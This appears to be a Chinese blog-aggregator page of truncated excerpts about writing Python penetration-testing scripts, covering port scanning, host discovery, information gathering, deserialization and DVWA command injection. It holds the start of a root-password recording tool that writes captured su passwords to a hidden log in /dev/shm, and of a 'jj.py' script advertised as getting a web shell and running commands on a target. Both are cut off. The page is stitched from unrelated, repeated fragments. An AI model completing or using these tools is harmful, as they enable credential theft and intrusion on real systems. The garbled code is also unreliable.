0×00渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。 0×01记录root密码小工具 root.py #!/usr/bin/python
import os, sys, getpass, time
current_time = time.strftime("%Y-%m-%d %H:%M
用python写渗透测试脚本 学习记录(四)用python写渗透测试脚本——信息收集之基于两种协议的主机发现这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。渗透测试的过程主要分为:明确目标信息收集漏洞检测漏洞验证信息分析获取所需信息清楚痕迹撰写报告最近的任务就是使用python完成第二项
转载
2023-06-25 12:22:52
200阅读
前言python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集。一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。端口扫描小脚本:对于端口扫描技术,其实分很多种,通常是利用tcp协议的三
Python序列化和反序列化使用以及部分漏洞利用最近研究了一下java和python的反序列化方面的漏洞,觉得很有意思,来做一个小小的总结,(PS:以前的博客停用了,现在在CSDN上继续更新,以前的文章会慢慢的搬过来)一.序列化与反序列化序列化:把对象转换为字节序列的过程称为对象的序列化反序列化:把字节序列恢复为对象的过程称为对象的反序列化。用途:把对象的字节序列永久地保存到硬盘上,通常存放在一个
转载
2023-09-04 14:00:10
0阅读
Author:JoyChou@美丽联合安全Date:201806051. 前言今天遇到一个不好做白名单的Python命令执行漏洞修复的问题。由于是shell=True导致的任意命令执行,一开始大胆猜测将True改为False即可,经过测试确实是这样,但是参数需要放在list里,稍微有点麻烦。后来考虑,还可以做黑名单,过滤掉特殊字符,那就写fuzz脚本跑那些需要过滤的字符。最后觉得黑名单方式可能会被
转载
2023-08-09 14:55:38
197阅读
核心思想: 在获取页面内容会后,用BeautifulSoup模块对页面标签进行提取,提取出页面中所有的Form表单,并进一步提取表单中的action属性(提交页面的目标URL),method属性,以及input,然后自动提交数据,实现漏洞的挖掘。import requests
from bs4 import BeautifulSoup
import sys
from urllib.parse
转载
2023-07-01 20:45:23
16阅读
工具简述本项目均为冰河亲自编写并整理的Python渗透脚本集合,可直接拿来用于渗透实战脚本说明com.binghe.hacker.tools.script.attack.crypt 包下的脚本:1.crypt_attack.py: 利用字典破解Unix/Linux口令com.binghe.hacker.tools.script.attack.ssh 包下的脚本1. pxssh_connection
扫描本机开放的端口:#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threa
转载
2023-07-07 23:05:36
2阅读
用python写渗透测试脚本 学习记录(五)用python写渗透测试脚本——基于tcp协议的端口扫描这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。本人在学习过程中主要参考书籍为《Python安全攻防——渗透测试指南》渗透测试的过程主要分为:明确目标信息收集漏洞检测漏洞验证信息分析获取所
0x00的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。0x01记录root小工具root.pyDefault#!/usr/bin/pythonimport os, sys, getpass, timecurrent_time = time.strftime("%Y-%m-%d %H:%M")log
前言python是门简单易学的语言,强大的第三方库让我们在编程中事半功倍,今天我们就来谈谈python在渗透测试中的应用,让我们自己动手打造自己的渗透工具集。一、信息搜集--py端口扫描小脚本端口扫描是渗透测试中常用的技术手段,发现敏感端口,尝试弱口令或者默认口令爆破也是常用的手段,之前自学python时候百度着写了个小脚本。端口扫描小脚本:#coding: utf-8
import socket
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小实用。一、记录root密码小工具root.py
#!/usr/bin/python
import os, sys, getpass, time
current_time= time.strftime("%Y-%m-%d %H:%M")
logfile="/dev/shm/.su
利用脚本。exp:python jj.py http://123.123.123.123 ->直接GETSHELL
python jj.py http://123.123.123.123 "whoami" ->执行命令
#author:we8i&90sec
importurllib2,urllib,base64importcookielib,sys,re
cj=cookieli
转载
2023-11-04 15:05:50
3阅读
用python写渗透测试脚本——信息收集之爬取邮箱这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。本人在学习过程中主要参考书籍为《Python安全攻防——渗透测试指南》渗透测试的过程主要分为:明确目标信息收集漏洞检测漏洞验证信息分析获取所需信息清楚痕迹撰写报告最近的任务就是使用pytho
文章目录综述源码和使用说明 综述date:2022-09-28按照版本号报告漏洞的扫描器有点搞,人工统计高危漏洞像是一种折磨,考虑编写脚本。提取对象:word文件里的紧急和高危漏洞。(需要筛选)提取数据:漏洞名称+影响主机,不统计漏洞类型是 SSH漏洞 和 数据库漏洞的记录。思路:首先删除所有无关信息,只保留紧急和高危部分的内容,如图源码和使用说明word报告准备:删除所有无关信息,只保留紧急和
CMS识别(web指纹识别)扫描器开发 一、实验介绍 1.1 实验内容 在网站渗透的过程中,我们可以对网站进行扫描识别出使用的程序。今天我们就来做这个WEB指纹识别工具。 1.2 实验知识点web指纹收集指纹分析md5校验关键词校验 1.3 实验环境Python2.7Xfce终端Sublime 1.4 适合人群 本课程难度为一般,属于初级级别课程,适合具有Python基础的用户,熟悉pytho
Android应用可能会使用sockets(TCP、UDP、UNIX)在应用间或者自身应用组件间进行通信,然而这种通信方式本身并没有提供任何身份认证。● 当开放端口绑定到0.0.0.0,那么任何IP都可以访问。● 当开放端口绑定到127.0.0.1,那么同一设备上的应用依然可以访问。一旦端口访问身份验证不严,就有可能产生漏洞,造成远程命令执行。漏洞挖掘方法1、查看应用端口开放情况方法一(1)使用n
用python写渗透测试脚本——信息收集之子域名挖掘这是本人第一次写博客,本人作为网络安全初学者,希望通过写博客的形式,记录、巩固、强化自己学习到的东西。同时希望在写博客的过程中能够发现自己的不足,逐渐提高自己。本人在学习过程中主要参考书籍为《Python安全攻防——渗透测试指南》渗透测试的过程主要分为:明确目标信息收集漏洞检测漏洞验证信息分析获取所需信息清楚痕迹撰写报告最近的任务就是使用pyth
## 栈溢出漏洞验证Python脚本
栈溢出是一种常见的安全漏洞,攻击者可以利用这种漏洞来执行恶意代码。Python是一种流行的编程语言,但也存在栈溢出漏洞。在本文中,我们将介绍如何验证Python脚本中的栈溢出漏洞,并提供一个简单的示例代码。
### 什么是栈溢出漏洞?
栈溢出是指在程序执行过程中,当向栈空间中写入数据时超过了栈的边界,导致覆盖了栈中的其他数据或者代码。攻击者可以利用这种漏
使用Python脚本学习DVWACommand Injection(命令注入)LowPython 脚本执行结果注入其它命令执行结果MediumPython 脚本执行结果DOS中符号总结HighPython 脚本执行结果Impossible Command Injection(命令注入)本文全程参考[]向该博主致谢Low浏览器按F12打开开发人员调试利器,访问DVWA。 发现使用post方法访问h